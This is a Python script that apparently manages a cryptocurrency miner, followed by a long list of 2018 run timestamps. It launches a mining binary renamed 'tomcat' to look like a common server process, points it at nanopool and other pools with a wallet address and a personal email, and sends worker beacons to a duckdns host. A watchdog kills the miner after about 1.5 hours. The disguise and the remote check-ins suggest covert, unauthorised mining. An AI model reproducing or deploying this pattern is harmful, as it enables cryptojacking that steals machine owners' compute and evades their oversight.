import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:49:04.751913
#2018-02-17 17:37:04.055096
#2018-02-17 19:26:05.208091
#2018-02-17 21:17:05.691413
#2018-02-17 23:01:07.358377
#2018-02-18 00:50:04.473015
#2018-02-18 02:39:05.989347
#2018-02-18 04:27:01.368328
#2018-02-18 06:18:03.941612
#2018-02-18 08:07:05.282369
#2018-02-18 09:54:02.046041
#2018-02-18 11:41:04.982485
#2018-02-18 13:26:05.392365
#2018-02-18 15:16:03.290792
#2018-02-18 17:05:07.188731
#2018-02-18 18:52:01.268468
#2018-02-18 20:39:05.147698
#2018-02-18 22:25:07.542565
#2018-02-19 00:14:01.479658
#2018-02-19 02:00:06.131779
#2018-02-19 03:47:06.035618
#2018-02-19 05:33:05.608540
#2018-02-19 07:21:05.913704
#2018-02-19 09:11:04.222142
#2018-02-19 10:59:04.895760
#2018-02-19 12:46:04.948667
#2018-02-19 14:33:05.395525
#2018-02-19 16:20:10.681694
#2018-02-19 18:06:08.597676
#2018-02-19 19:53:03.958422
#2018-02-19 21:42:01.752998
#2018-02-19 23:28:05.808773
#2018-02-20 01:14:06.783320
#2018-02-20 03:04:01.524465
#2018-02-20 04:52:04.070939
#2018-02-20 06:35:01.623934
#2018-02-20 08:20:07.589515
#2018-02-20 10:06:01.996024
#2018-02-20 11:50:10.315118
#2018-02-20 13:38:08.325982
#2018-02-20 15:23:01.306848
#2018-02-20 17:07:08.730681
#2018-02-20 18:57:06.784828
#2018-02-20 20:47:08.579775
#2018-02-20 22:30:05.279701
#2018-02-21 00:11:05.499854
#2018-02-21 01:56:05.863312
#2018-02-21 03:46:01.248438
#2018-02-21 05:34:05.634322
#2018-02-21 07:23:15.043157
#2018-02-21 09:08:05.780620
#2018-02-21 10:57:06.001996
#2018-02-21 12:43:01.351317
#2018-02-21 14:30:13.340797
#2018-02-21 16:18:02.055767
#2018-02-21 18:08:04.589260
#2018-02-21 19:54:05.137502
#2018-02-21 21:42:01.311664
#2018-02-21 23:31:06.693200
#2018-02-22 01:19:04.957258
#2018-02-22 03:09:01.332714
#2018-02-22 04:53:07.540365
#2018-02-22 06:38:02.058902
#2018-02-22 08:27:05.111027
#2018-02-22 10:14:03.854651
#2018-02-22 11:58:04.113559
#2018-02-22 13:45:11.753218
#2018-02-22 15:33:04.165709
#2018-02-22 17:18:06.980385
#2018-02-22 19:05:09.827907
#2018-02-22 20:56:05.027557
#2018-02-22 23:59:05.977109
#2018-02-23 01:49:01.952223
#2018-02-23 03:37:06.732188
#2018-02-23 05:23:07.816289
#2018-02-23 07:10:04.150533
#2018-02-23 09:14:03.958836
#2018-02-23 11:21:06.146526
#2018-02-23 13:11:07.212872
#2018-02-23 14:57:07.338659
#2018-02-23 16:47:01.598021
#2018-02-23 18:41:05.326618
#2018-02-23 20:27:05.171833
#2018-02-23 22:15:07.974467
#2018-02-24 00:02:07.500998
#2018-02-24 01:51:07.645288
#2018-02-24 03:41:01.988111
#2018-02-24 05:26:05.162178
#2018-02-24 07:13:01.835649
#2018-02-24 09:01:07.822367
#2018-02-24 11:01:01.484598
#2018-02-24 12:48:05.457861
#2018-02-24 14:37:01.218576
#2018-02-24 16:24:06.817674
#2018-02-24 18:17:04.142941
#2018-02-24 20:04:05.957999
#2018-02-24 21:47:06.331231
#2018-02-25 00:48:02.157074
#2018-02-25 04:49:05.153778
#2018-02-25 09:16:01.123863